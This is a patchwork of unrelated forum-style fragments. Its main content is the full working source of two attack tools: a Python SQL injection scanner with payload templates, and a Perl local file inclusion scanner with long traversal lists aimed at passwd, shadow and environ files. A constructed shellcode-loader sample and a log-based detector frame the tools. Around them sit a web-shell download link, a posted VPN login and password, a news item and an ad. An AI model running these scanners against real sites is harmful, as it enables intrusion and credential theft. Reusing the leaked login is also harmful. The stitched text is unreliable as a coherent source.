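    return {"apis": apis, "rwx": rwx, "embedded_bytes": embedded, "verdict": verdict}


# Constructed placeholder data (ASCII letters), standing in for real payload bytes.
_PLACEHOLDER = " ".join(str(65 + i % 26) for i in range(20))

# Constructed sample with the same shape as the listing above.
SAMPLE_LOADER = '''
Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long) As Integer
Private Declare Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long) As Long
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40
Private Function ShellCode1() As String
    sShellCode = sShellCode + ParseBytes("%s")
    sShellCode = sShellCode + ParseBytes("%s")
End Function
''' % (_PLACEHOLDER, _PLACEHOLDER)

# Constructed benign macro: one harmless API import and ordinary worksheet code.
SAMPLE_BENIGN = '''
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Sub FormatReport()
    Range("A1:D1").Font.Bold = True
    Sleep 100
End Sub
'''

if __name__ == "__main__":
    for name, text in (("loader", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN)):
        print(name, analyze_macro(text))
```
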
-
Below you can find the Source Code of the Damn Small SQLi Scanner (DSSS) v. 0.1b having less than 100 LOC (Lines of Code):

#!/usr/bin/env python

import difflib, httplib, optparse, random, re, sys, urllib2, urlparse

NAME = "Damn Small SQLi Scanner (DSSS) < 100 LOC (Lines of Code)"
VERSION = "0.1b"
AUTHOR = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)"
LICENSE = "GPLv2 (www.gnu.org/licenses/gpl-2.0.html)"
NOTE = "This is a fully working PoC proving that commercial (SQLi) scanners can be beaten under 100 lines of code (6 hours of work, boolean, error, level 1 crawl)"

INVALID_SQL_CHAR_POOL = ['(',')','\'','"']
CRAWL_EXCLUDE_EXTENSIONS = ("gif","jpg","jar","tif","bmp","war","ear","mpg","wmv","mpeg","scm","iso","dmp","dll","cab","so","avi","bin","exe","iso","tar","png","pdf","ps","mp3","zip","rar","gz")

SUFFIXES = ["", "-- ", "#"]
PREFIXES = [" ", ") ", "' ", "') "]
BOOLEANS = ["AND %d=%d", "OR NOT (%d=%d)"]

# Error-message signatures, grouped by the DBMS that emits them
DBMS_ERRORS = {}
DBMS_ERRORS["MySQL"] = [r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."]
DBMS_ERRORS["PostgreSQL"] = [r"PostgreSQL.*ERROr", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."]
DBMS_ERRORS["Microsoft SQL Server"] = [r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"Exception Details:.*\WSystem\.Data\.SqlClient\.", r"Exception Details:.*\WRoadhouse\.Cms\."]
DBMS_ERRORS["Microsoft Access"] = [r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"]
DBMS_ERRORS["Oracle"] = [r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"]
DBMS_ERRORS["IBM DB2"] = [r"CLI Driver.*DB2", r"DB2 SQL error", r"db2_connect\(", r"db2_exec\(", r"db2_execute\(", r"db2_fetch_"]
DBMS_ERRORS["Informix"] = [r"Exception.*Informix"]
DBMS_ERRORS["Firebird"] = [r"Dynamic SQL Error", r"Warning.*ibase_.*"]
DBMS_ERRORS["SQLite"] = [r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::"]
DBMS_ERRORS["SAP MaxDB"] = [r"SQL error.*POS([0-9]+).*", r"Warning.*maxdb.*"]
DBMS_ERRORS["Sybase"] = [r"Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"]
DBMS_ERRORS["Ingres"] = [r"Warning.*ingres_", r"Ingres SQLSTATE", r"Ingres\W.*Driver"]

def getTextOnly(page):
    # Drop scripts, comments, styles and tags so only the visible text is compared
    retVal = re.sub(r"(?s)<script.+?</script>|<!--.+?-->|<style.+?</style>|<[^>]+>|\s", " ", page)
    retVal = re.sub(r"\s{2,}", " ", retVal)
    return retVal

def retrieveContent(url):
    retVal = ["", httplib.OK, "", ""] # [filtered/textual page content, HTTP code, page title, full page content]
    try:
        retVal[3] = urllib2.urlopen(url.replace(" ", "%20")).read()
    except Exception, e:
        if hasattr(e, 'read'):
            retVal[3] = e.read()
        elif hasattr(e, 'msg'):
            retVal[3] = e.msg
        retVal[1] = e.code if hasattr(e, 'code') else None
    match = re.search(r"<title>(?P<title>[^<]+)</title>", retVal[3])
    retVal[2] = match.group("title") if match else ""
    retVal[0] = getTextOnly(retVal[3])
    return retVal

def shallowCrawl(url):
    # Level 1 crawl: the start URL plus same-host links found on it
    retVal = set([url])
    page = retrieveContent(url)[3]
    for match in re.finditer(r"href\s*=\s*\"(?P<href>[^\"]+)\"", page, re.I):
        link = urlparse.urljoin(url, match.group("href"))
        if link.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS:
            if reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, link])):
                retVal.add(link)
    return retVal

def scanPage(url):
    for link in shallowCrawl(url):
        print "* scanning: %s" % link
        for match in re.finditer(r"(?:[?&;])((?P<parameter>\w+)=[^&;]+)", link):
            vulnerable = False
            # Error-based check: append invalid SQL characters and look for a DBMS error message
            tampered = link.replace(match.group(0), match.group(0) + "".join(random.sample(INVALID_SQL_CHAR_POOL, len(INVALID_SQL_CHAR_POOL))))
            content = retrieveContent(tampered)
            for dbms in DBMS_ERRORS:
                for regex in DBMS_ERRORS[dbms]:
                    if not vulnerable and re.search(regex, content[0], re.I):
                        print " (o) parameter '%s' could be SQLi vulnerable! (%s error message)" % (match.group('parameter'), dbms)
                        vulnerable = True
            if not vulnerable:
                # Boolean-based check: compare responses to a true and a false condition
                original = retrieveContent(link)
                a, b = random.randint(100, 255), random.randint(100, 255)
                for prefix in PREFIXES:
                    for boolean in BOOLEANS:
                        for suffix in SUFFIXES:
                            if not vulnerable:
                                template = "%s%s%s" % (prefix, boolean, suffix)
                                payloads = (link.replace(match.group(0), match.group(0) + (template % (a, a))), link.replace(match.group(0), match.group(0) + (template % (a, b))))
                                contents = [retrieveContent(payloads[0]), retrieveContent(payloads[1])]
                                if any(map(lambda x: original[x] == contents[0][x] != contents[1][x], [1, 2])) or len(original[0]) == len(contents[0][0]) != len(contents[1][0]):
                                    vulnerable = True
                                else:
                                    ratios = map(lambda x: difflib.SequenceMatcher(None, original[0], x).quick_ratio(), [contents[0][0], contents[1][0]])
                                    vulnerable = ratios[0] > 0.95 and ratios[1] < 0.95
                                if vulnerable:
                                    print " (i) parameter '%s' appears to be SQLi vulnerable! (\"%s\")" % (match.group('parameter'), payloads[0])

if __name__ == "__main__":
    print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
    parser = optparse.OptionParser(version=VERSION)
    parser.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.target.com/page.htm?id=1\")")
    options, _ = parser.parse_args()
    if options.url:
        scanPage(options.url)
    else:
        parser.print_help()

http://www.aftershell.com/2011/07/16/python-damn-small-sqli-scanner-dsss-v0-1b/
-
Color Scheme Designer 3
Color Combinations | Color Schemes | Color Palettes
40 Useful Online Generators For Web Designers - Noupe Design Blog
CSSREMIX
-
Download link:
Download: SyRiAn Sh3ll 7 ≈ Packet Storm
Mirror: http://pastebin.com/qvS03QCD
-
This is a simple Perl script called Viper LFI Scanner that enumerates local file inclusion attempts when given a specific target.

Changes: New bypass method added and ability to read /etc/passwd.

#!/usr/bin/perl
#
# ////////////////////////////////////
# Viper LFI Scanner Ver. 4.0
# ////////////////////////////////////
#
# Title : Viper Lfi Scanner Ver. 4.0
# Author: Bl4ck.Viper
# From : Azarbycan
# Date : 2011/07/06
# Category : Scanner
# Home : www.Skote-vahshat.com
# Emails : Bl4ck.Viper@Yahoo.com , Bl4ck.Viper@Hotmail.com , Bl4ck.Viper@Gmail.com
#
#
# Description :Log , Environ , Passwd File Scanner ,& new method for bypass passwd
#
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

use HTTP::Request;
use LWP::UserAgent;

system ("cls");
print "\t\t/////////////////////////////////////////////////\n";
print "\t\t_________________________________________________\n";
print "\t\t\t Viper LFI Scanner Ver. 3.0\n";
print "\t\t\t Coded By Bl4ck.Viper\n";
print "\t\t\t Made In Azarbycan\n";
print "\t\t\t Version In English\n";
print "\t\t_________________________________________________\n";
print "\n\n";
sleep (1);
print "\t\t\t\t WELCOME\n";
print "\n\n";

menu:;
print "\tMenu:\n";
print "\t ID[1]=>Passwd,Log";
print "\t[Scan Files Of /etc/ Directory]\n";
print "\t ID[2]=>Environ";
print "\t\t[Scan Environ File For Inject Shell By U-Agent]\n";
print"\n";
print "\t\t Select ID For Start Scanner :";
$menu = <>;
if ($menu =~ /1/){
    goto lfi;
}
if ($menu =~ /2/){
    goto env;
}
else {
    print"\n\n";
    print "\t\tUnknow Command\n";
    goto menu;
};

lfi:;
print "\n\n";
print "\t\t\tWelcome To /etc/ Section With New Method\n\n";
print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
print "\t Target :";
$host=<STDIN>;
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };
print "\n\n";
print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
print "\n\n";

@lfi = ('../etc/passwd', '../../etc/passwd', '../../../etc/passwd',
'../../../../etc/passwd', '../../../../../etc/passwd', '../../../../../../etc/passwd', '../../../../../../../etc/passwd', '../../../../../../../../etc/passwd', '../../../../../../../../../etc/passwd', '../../../../../../../../../../etc/passwd', '../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../../../../etc/passwd', '....//etc/passwd', '....//....//etc/passwd', '....//....//....//etc/passwd', '....//....//....//....//etc/passwd', '....//....//....//....//....//etc/passwd', '....//....//....//....//....//....//etc/passwd', '....//....//....//....//....//....//....//etc/passwd', '....//....//....//....//....//....//....//....//etc/passwd', '....//....//....//....//....//....//....//....//....//etc/passwd', '....//....//....//....//....//....//....//....//....//....//etc/passwd', '../../etc/passwd%00', '../../../etc/passwd%00', '../../../../etc/passwd%00', '../../../../../etc/passwd%00', '../../../../../../etc/passwd%00', '../../../../../../../etc/passwd%00', '../../../../../../../../etc/passwd%00', '../../../../../../../../../etc/passwd%00', '../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../../../../../../etc/passwd%00', '....//etc/passwd%00', '....//....//etc/passwd%00', '....//....//....//etc/passwd%00', '....//....//....//....//etc/passwd%00', '....//....//....//....//....//etc/passwd%00', '....//....//....//....//....//....//etc/passwd%00', '....//....//....//....//....//....//....//etc/passwd%00', '....//....//....//....//....//....//....//....//etc/passwd%00', 
'....//....//....//....//....//....//....//....//....//etc/passwd%00', '....//....//....//....//....//....//....//....//....//....//etc/passwd%00', '../etc/shadow', '../../etc/shadow', '../../../etc/shadow', '../../../../etc/shadow', '../../../../../etc/shadow', '../../../../../../etc/shadow', '../../../../../../../etc/shadow', '../../../../../../../../etc/shadow', '../../../../../../../../../etc/shadow', '../../../../../../../../../../etc/shadow', '../../../../../../../../../../../etc/shadow', '../../../../../../../../../../../../etc/shadow', '../../../../../../../../../../../../../etc/shadow', '../../../../../../../../../../../../../../etc/shadow', '../etc/shadow%00', '../../etc/shadow%00', '../../../etc/shadow%00', '../../../../etc/shadow%00', '../../../../../etc/shadow%00', '../../../../../../etc/shadow%00', '../../../../../../../etc/shadow%00', '../../../../../../../../etc/shadow%00', '../../../../../../../../../etc/shadow%00', '../../../../../../../../../../etc/shadow%00', '../../../../../../../../../../../etc/shadow%00', '../../../../../../../../../../../../etc/shadow%00', '../../../../../../../../../../../../../etc/shadow%00', '../../../../../../../../../../../../../../etc/shadow%00', '../etc/group', '../../etc/group', '../../../etc/group', '../../../../etc/group', '../../../../../etc/group', '../../../../../../etc/group', '../../../../../../../etc/group', '../../../../../../../../etc/group', '../../../../../../../../../etc/group', '../../../../../../../../../../etc/group', '../../../../../../../../../../../etc/group', '../../../../../../../../../../../../etc/group', '../../../../../../../../../../../../../etc/group', '../../../../../../../../../../../../../../etc/group', '../etc/group%00', '../../etc/group%00', '../../../etc/group%00', '../../../../etc/group%00', '../../../../../etc/group%00', '../../../../../../etc/group%00', '../../../../../../../etc/group%00', '../../../../../../../../etc/group%00', '../../../../../../../../../etc/group%00', 
'../../../../../../../../../../etc/group%00', '../../../../../../../../../../../etc/group%00', '../../../../../../../../../../../../etc/group%00', '../../../../../../../../../../../../../etc/group%00', '../../../../../../../../../../../../../../etc/group%00', '../etc/security/group', '../../etc/security/group', '../../../etc/security/group', '../../../../etc/security/group', '../../../../../etc/security/group', '../../../../../../etc/security/group', '../../../../../../../etc/security/group', '../../../../../../../../etc/security/group', '../../../../../../../../../etc/security/group', '../../../../../../../../../../etc/security/group', '../../../../../../../../../../../etc/security/group', '../etc/security/group%00', '../../etc/security/group%00', '../../../etc/security/group%00', '../../../../etc/security/group%00', '../../../../../etc/security/group%00', '../../../../../../etc/security/group%00', '../../../../../../../etc/security/group%00', '../../../../../../../../etc/security/group%00', '../../../../../../../../../etc/security/group%00', '../../../../../../../../../../etc/security/group%00', '../../../../../../../../../../../etc/security/group%00', '../etc/security/passwd', '../../etc/security/passwd', '../../../etc/security/passwd', '../../../../etc/security/passwd', '../../../../../etc/security/passwd', '../../../../../../etc/security/passwd', '../../../../../../../etc/security/passwd', '../../../../../../../../etc/security/passwd', '../../../../../../../../../etc/security/passwd', '../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../../../../etc/security/passwd', '../etc/security/passwd%00', '../../etc/security/passwd%00', '../../../etc/security/passwd%00', '../../../../etc/security/passwd%00', '../../../../../etc/security/passwd%00', 
    '../../../../../../etc/security/passwd%00',
    '../../../../../../../etc/security/passwd%00',
    '../../../../../../../../etc/security/passwd%00',
    '../../../../../../../../../etc/security/passwd%00',
    '../../../../../../../../../../etc/security/passwd%00',
    '../../../../../../../../../../../etc/security/passwd%00',
    '../../../../../../../../../../../../etc/security/passwd%00',
    '../../../../../../../../../../../../../etc/security/passwd%00',
    '../../../../../../../../../../../../../../etc/security/passwd%00',
    '../etc/security/user',
    '../../etc/security/user',
    '../../../etc/security/user',
    '../../../../etc/security/user',
    '../../../../../etc/security/user',
    '../../../../../../etc/security/user',
    '../../../../../../../etc/security/user',
    '../../../../../../../../etc/security/user',
    '../../../../../../../../../etc/security/user',
    '../../../../../../../../../../etc/security/user',
    '../../../../../../../../../../../etc/security/user',
    '../../../../../../../../../../../../etc/security/user',
    '../../../../../../../../../../../../../etc/security/user',
    '../etc/security/user%00',
    '../../etc/security/user%00',
    '../../../etc/security/user%00',
    '../../../../etc/security/user%00',
    '../../../../../etc/security/user%00',
    '../../../../../../etc/security/user%00',
    '../../../../../../../etc/security/user%00',
    '../../../../../../../../etc/security/user%00',
    '../../../../../../../../../etc/security/user%00',
    '../../../../../../../../../../etc/security/user%00',
    '../../../../../../../../../../../etc/security/user%00',
    '../../../../../../../../../../../../etc/security/user%00',
    '../../../../../../../../../../../../../etc/security/user%00');

foreach $scan(@lfi){
    $url = $host.$scan;
    $request = HTTP::Request->new(GET=>$url);
    $useragent = LWP::UserAgent->new();
    $response = $useragent->request($request);
    if ($response->is_success && $response->content =~ /root:x:/) { $msg = "Vulnerability"; }
    else { $msg = "Not Found"; }
    print "$scan..........[$msg]\n";
}

env:;
print "\n\n";
print "\t\t\tWelcom To Environ Section\n\n";
print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
print "\t Target :";
$host=<STDIN>;
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };
print "\n\n";
print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
print "\n\n";

@env = ('../proc/self/environ',
    '../../proc/self/environ',
    '../../../proc/self/environ',
    '../../../../proc/self/environ',
    '../../../../../proc/self/environ',
    '../../../../../../proc/self/environ',
    '../../../../../../../proc/self/environ',
    '../../../../../../../../proc/self/environ',
    '../../../../../../../../../proc/self/environ',
    '../../../../../../../../../../proc/self/environ',
    '../../../../../../../../../../../proc/self/environ',
    '../../../../../../../../../../../../proc/self/environ',
    '../../../../../../../../../../../../../proc/self/environ',
    '../../../../../../../../../../../../../../proc/self/environ',
    '../proc/self/environ%00',
    '../../proc/self/environ%00',
    '../../../proc/self/environ%00',
    '../../../../proc/self/environ%00',
    '../../../../../proc/self/environ%00',
    '../../../../../../proc/self/environ%00',
    '../../../../../../../proc/self/environ%00',
    '../../../../../../../../proc/self/environ%00',
    '../../../../../../../../../proc/self/environ%00',
    '../../../../../../../../../../proc/self/environ%00',
    '../../../../../../../../../../../proc/self/environ%00',
    '../../../../../../../../../../../../proc/self/environ%00',
    '../../../../../../../../../../../../../proc/self/environ%00',
    '../../../../../../../../../../../../../../proc/self/environ%00');

foreach $scan_env(@env){
    $url = $host.$scan_env;
    $request = HTTP::Request->new(GET=>$url);
    $useragent = LWP::UserAgent->new();
    $response = $useragent->request($request);
    if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = "Vulnerability"; }
    else { $msg = "Not Found"; }
    print "$scan_env..........[$msg]\n";
}

# Bl4ck.Viper Turkish Hacker
# Copyright 2010 Black Viper

Download link: LFI Scanner 4.0 ≈ Packet Storm
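Seen from the defending side, the request ladder this script produces stands out in web server logs. The following is an added example, not part of the original post or of the script: it flags clients whose query parameters carry the `../`, `....//` and `%00` forms listed above. The log layout, the function names, the threshold and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# File targets the scanner above asks for (taken from its @lfi and @env lists).
SENSITIVE = ("etc/passwd", "etc/shadow", "etc/group", "etc/security/",
             "proc/self/environ")
# Assumed log layout: client address first, request line in double quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jul/2011:10:00:01 +0000] "GET /index.php?page=../etc/passwd HTTP/1.1" 200 512',
    '192.0.2.10 - - [06/Jul/2011:10:00:01 +0000] "GET /index.php?page=../../etc/passwd%00 HTTP/1.1" 200 512',
    '192.0.2.10 - - [06/Jul/2011:10:00:02 +0000] "GET /index.php?page=....//....//etc/passwd HTTP/1.1" 200 2048',
    '192.0.2.10 - - [06/Jul/2011:10:00:02 +0000] "GET /index.php?page=../../../proc/self/environ HTTP/1.1" 200 512',
    '198.51.100.7 - - [06/Jul/2011:10:00:05 +0000] "GET /index.php?page=contact HTTP/1.1" 200 4096',
    '198.51.100.7 - - [06/Jul/2011:10:00:06 +0000] "GET /docs/../img/logo.png HTTP/1.1" 200 900',
]


def classify(target):
    """Return the set of reasons a request target looks like an LFI probe."""
    reasons = set()
    # Only query-string values are inspected, since the script appends to a parameter.
    for pair in re.split(r"[&;]", urlsplit(target).query):
        value = unquote(pair.partition("=")[2])
        if "\x00" in value:
            reasons.add("null-byte")      # decoded '%00' suffix
        if "../" in value:
            reasons.add("traversal")
        # '....//' still yields '../' after one pass of a naive '../' filter.
        if "../" in value.replace("../", ""):
            reasons.add("filter-bypass")
        if any(name in value.lower() for name in SENSITIVE):
            reasons.add("sensitive-file")
    return reasons


def find_scanners(lines, min_probes=3):
    """Group probe requests by client and keep clients with repeated probes."""
    hits = defaultdict(lambda: {"count": 0, "reasons": set()})
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        reasons = classify(match.group("target"))
        if reasons:
            hits[match.group("ip")]["count"] += 1
            hits[match.group("ip")]["reasons"] |= reasons
    return {ip: info for ip, info in hits.items() if info["count"] >= min_probes}


if __name__ == "__main__":
    for ip, info in find_scanners(SAMPLE_LOG).items():
        print(ip, info["count"], sorted(info["reasons"]))
```

The `filter-bypass` reason is the one worth alerting on first: it only fires for input built to survive a single-pass `../` strip, which ordinary traffic does not produce.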
-
Romanian students were the big stars of the Imagine Cup, organized by IT giant Microsoft. The Romanian team won the Digital Media section.

Microsoft appreciated the way technology can solve humanity's current problems. The Endeavour Design team, made up of students from the Gheorghe Asachi Technical University of Iași, stood out by creating an autonomous robot that can be used in rescue operations.

At the 2011 edition of the Imagine Cup, 350,000 students took part, grouped into teams that competed in nine sections. Romanian students reached the final in four of them, and the MNA team won the Digital Media final.

"We must work together to eliminate poverty and disease. We must work together to combat global warming and protect the environment. You devise answers to these difficult questions, and only through imagination and creation," said Michael Bloomberg, mayor of New York City, at the awards ceremony.

Romanians also won Imagine Cup sections in 2004 and 2009. This year a team from Ireland took the grand prize.

Romanian students awarded by Microsoft: The young people created a robot that can be used in rescue operations
-
Do It Yourself Business Websites.
Easily create a beautiful, personalized business site that gets customers to your door.

All Your Social Media: Connect to all of your accounts in one place.
Beautiful Design: Keeping it simple is the secret to looking good.
Insightful Analytics: See who's visiting and watch as you drive more traffic over time.
Hosting made easy: Use the best tools without breaking the bank.
Get Found Online: Your dedicated page makes finding you online a snap.
Stay Current: Make sure people don't forget by using the latest tools.

Tutorial Video: Create a Small Business Website with Central.ly on Vimeo

Central.ly
-
http://rstcenter.com/forum/21625-%5Brst%5D-mail-tools.rst
-
- - user: tuvpnfreeproxy pass: Hdpsm6kY - - TUVPN.com - - bucharest.tuvpn.com (Romania) chicago.tuvpn.com (USA) london.tuvpn.com (UK) amsterdam.tuvpn.com (The Netherlands) madrid.tuvpn.com (Spain) steinsel.tuvpn.com (Luxembourg) kualalumpur.tuvpn.com (Malaysia) montreal.tuvpn.com (Canada) roubaix.tuvpn.com (France) erfurt.tuvpn.com (Germany) stockholm.tuvpn.com (Sweden) vpn.tuvpn.com (random connection to any of our nodes) tutorial firefox
-
For Winamp there was a plugin.
Download link: Download LED-KEYBOARD 2.0
And what you are looking for, I assume, is this: http://www.youtube.com/watch?v=VhNqp3zUrRw&feature=fvwrel